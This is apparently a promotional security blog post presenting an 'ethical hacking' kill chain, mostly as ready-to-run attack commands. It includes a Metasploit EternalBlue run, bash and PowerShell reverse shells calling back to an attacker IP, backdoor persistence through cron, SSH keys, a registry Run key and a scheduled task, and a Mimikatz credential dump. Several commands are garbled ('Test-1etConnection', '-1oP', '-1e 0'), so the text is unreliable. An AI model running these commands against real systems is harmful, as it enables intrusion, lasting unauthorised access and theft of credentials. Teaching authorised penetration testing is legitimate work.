Listen to this Post
Introduction:
Ethical hacking follows a structured kill chain to identify vulnerabilities before malicious actors exploit them. As highlighted by cybersecurity professional Daniel Johnson, mastering tool‑specific workflows across reconnaissance, scanning, exploitation, persistence, privilege escalation, and reporting transforms theoretical knowledge into actionable penetration testing skills. This article breaks down each phase with verified commands, configuration examples, and mitigation strategies for both Linux and Windows environments.
Learning Objectives:
- Map the six stages of ethical hacking to real‑world tool usage (Nmap, Metasploit, Mimikatz, etc.)
- Execute reconnaissance, scanning, and privilege escalation techniques with step‑by‑step command examples
- Apply persistence mechanisms and generate professional reports to document findings
You Should Know:
- Reconnaissance & OSINT – Passive and Active Information Gathering
This phase collects publicly available data and network intelligence without triggering alarms. Daniel Johnson’s graphic positions tools like theHarvester, Maltego, and Recon‑ng at this stage. Below are active reconnaissance commands.
Linux (Debian/Ubuntu)
Passive: Gather emails/domains theHarvester -d target.com -b google,bing -f output.html Active: Discover live hosts (stealth SYN scan) sudo nmap -sn 192.168.1.0/24 -T4 DNS enumeration dnsrecon -d target.com -t axfr
Windows (PowerShell as admin)
Basic ping sweep
1..254 | ForEach-Object { Test-Connection -ComputerName "192.168.1.$_" -Count 1 -Quiet }
DNS zone transfer attempt
Resolve-DnsName -Type AXFR target.com
Step‑by‑Step Guide
1. Define the target scope (IP ranges, domains).
- Run theHarvester to collect email addresses and subdomains.
- Use Nmap’s `-sn` flag for ICMP‑only discovery to minimise logs.
- Save all output to a structured folder (
./recon/) for later correlation. -
Scanning & Enumeration – Ports, Services and Vulnerabilities
Detailed probes identify open ports, running services, and potential CVEs. Nmap, masscan, and Nessus are core tools.
Nmap Aggressive Scan (Linux)
Service version, OS detection, default scripts nmap -sV -sC -O -p- 192.168.1.10 -oA scan_target
Masscan for speed (large networks)
sudo masscan -p1-65535 192.168.1.0/24 --rate=10000 -oL masscan.out
Windows – Port Query
Test specific TCP port Test-1etConnection 192.168.1.10 -Port 443 Enumerate SMB shares Get-SmbShare -CimSession 192.168.1.10
Step‑by‑Step Guide
- Run `nmap -sS -p-` to perform a stealth SYN scan on all ports.
- Pipe the open ports into a second scan with `-sV -sC` for detailed fingerprinting.
3. For web applications, use `nmap –script=http-enum`.
- Export results to XML/HTML for reporting (e.g.,
-oX report.xml). -
Gaining Access – Exploitation Frameworks & Reverse Shells
After identifying vulnerable services (e.g., unpatched SMB, weak credentials), tools like Metasploit, sqlmap, and custom payloads deliver the initial foothold.
Metasploit (Linux)
msfconsole msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set RHOSTS 192.168.1.10 msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 > set LHOST 192.168.1.5 msf6 > exploit
Manual Reverse Shell (Linux target)
Listener (attacker) nc -lvnp 4444 Payload on target (if command injection exists) bash -i >& /dev/tcp/192.168.1.5/4444 0>&1
Windows One‑Liner (PowerShell)
powershell -1oP -1onI -W Hidden -Exec Bypass -Command "$c=New-Object System.Net.Sockets.TCPClient('192.168.1.5',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -1e 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb + 'PS ' + (pwd).Path + '> ';$sbt=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$c.Close()"
Step‑by‑Step Guide
- Start Metasploit and search for a vulnerability matching the enumerated service.
2. Set RHOSTS, payload, and LHOST (your IP).
- If manual, start a Netcat listener on port 4444.
- Inject the reverse shell command via SQLi, file upload, or RCE.
- Immediately upgrade to a fully interactive TTY (Python:
python3 -c 'import pty; pty.spawn("/bin/bash")').
4. Maintaining Access – Persistence Mechanisms
Once inside, ethical hackers install backdoors or scheduled tasks to retain access even after reboots.
Linux – Cron Job Persistence
Edit current user's crontab crontab -e Add line: @reboot /home/user/.hidden_backdoor.sh
Linux – SSH Key Backdoor
Attacker adds own public key to target echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys
Windows – Registry Run Key (Admin)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Backdoor" /t REG_SZ /d "C:\Users\Public\malware.exe" /f
Windows – Scheduled Task (PowerShell)
$Action = New-ScheduledTaskAction -Execute "C:\Windows\System32\cmd.exe" -Argument "/c calc.exe" $Trigger = New-ScheduledTaskTrigger -AtLogOn -User "Administrator" Register-ScheduledTask -TaskName "PersistenceTask" -Action $Action -Trigger $Trigger -Force
Step‑by‑Step Guide
1. Identify writable directories or registry hives.
- For Linux, add a reverse shell script to `.bashrc` or crontab.
- For Windows, use `reg add` for simple persistence; for stealth, create a WMI event subscription.
4. Test persistence by rebooting the target system.
- Privilege Escalation – From User to Root / SYSTEM
After initial access, escalate to higher privileges using misconfigurations (sudo, SUID, unquoted service paths, kernel exploits).
Linux – Check Sudo Rights
sudo -l If (ALL) NOPASSWD: /bin/bash, run: sudo /bin/bash
Linux – Find SUID Binaries
find / -perm -4000 2>/dev/null Exploit known vulnerable SUID binary like pkexec (CVE‑2021‑4034)
Windows – Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\" If path contains spaces without quotes, drop a malicious executable
Windows – Mimikatz (Dump Credentials)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
Step‑by‑Step Guide
- Run `linpeas.sh` (Linux) or `winpeas.exe` (Windows) for automated enumeration.
- Check for unpatched kernels: `uname -a` and cross‑reference with Exploit‑DB.
- If sudo rights exist, escalate via `sudo -u root` commands.
- On Windows, dump LSASS memory with Mimikatz to extract plaintext passwords or hashes.
6. Reporting – Documenting Findings for Remediation
The final stage generates a professional report. Tools like Dradis, MagicTree, and manual templates structure vulnerabilities, evidence, and mitigation steps.
Dradis Framework (Linux)
Install via gem or Docker docker run -it -p 3000:3000 dradis/dradis-ce
Report Structure (Markdown/LaTeX)
Pentest Report – Target XYZ Executive Summary Methodology Findings (CVSS 3.1) - Vulnerability: EternalBlue (MS17-010) - Risk: Critical (9.8) - Evidence: Screenshot of exploit output - Remediation: Install patch KB4012212 Appendix – Commands and logs
Step‑by‑Step Guide
- Collect all scan outputs (
nmap -oA), screenshots, and exploit logs. - Use Dradis to merge team findings and generate consistent templates.
3. Assign CVSS scores to each vulnerability.
- Provide clear, actionable remediation steps (patch commands, config changes).
- Export to PDF and deliver to the client.
What Undercode Say:
- Key Takeaway 1: The ethical hacking process is not a linear “fire‑and‑forget” checklist – each stage feeds back into earlier phases when new assets or misconfigurations are discovered during enumeration.
- Key Takeaway 2: Mastery of command‑line tools (Nmap, Metasploit, Mimikatz) separates script‑kiddies from professionals; automation scripts like `linpeas` save hours, but understanding manual escalation steps is crucial for custom environments.
Analysis: Daniel Johnson’s visual summary correctly prioritises tool proficiency, yet the real challenge lies in chaining these stages adaptively. For instance, persistence is often neglected in CTF challenges but is the difference between a successful red‑team engagement and a lost shell. Privilege escalation on modern systems requires kernel‑exploit restraint; misconfigurations (sudo tokens, weak permissions) remain the most reliable vector. Reporting is tragically undervalued – a technically perfect test with a poor report fails to drive remediation. The inclusion of both Linux and Windows commands in this guide bridges the OS gap that many hackers overlook.
Prediction:
+1 AI‑powered reconnaissance tools (e.g., automated OSINT with LLMs) will slash discovery time by 80%, letting testers focus on complex chaining.
-1 As EDR/XDR systems adopt machine learning, traditional payloads and persistence methods will become nearly useless, forcing a shift toward living‑off‑the‑land (LotL) and custom tooling.
+1 Certification programs (like TCM Practical Help Desk and KCNS) are raising baseline competence, reducing the number of basic misconfigurations in production.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Daniel Johnson – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
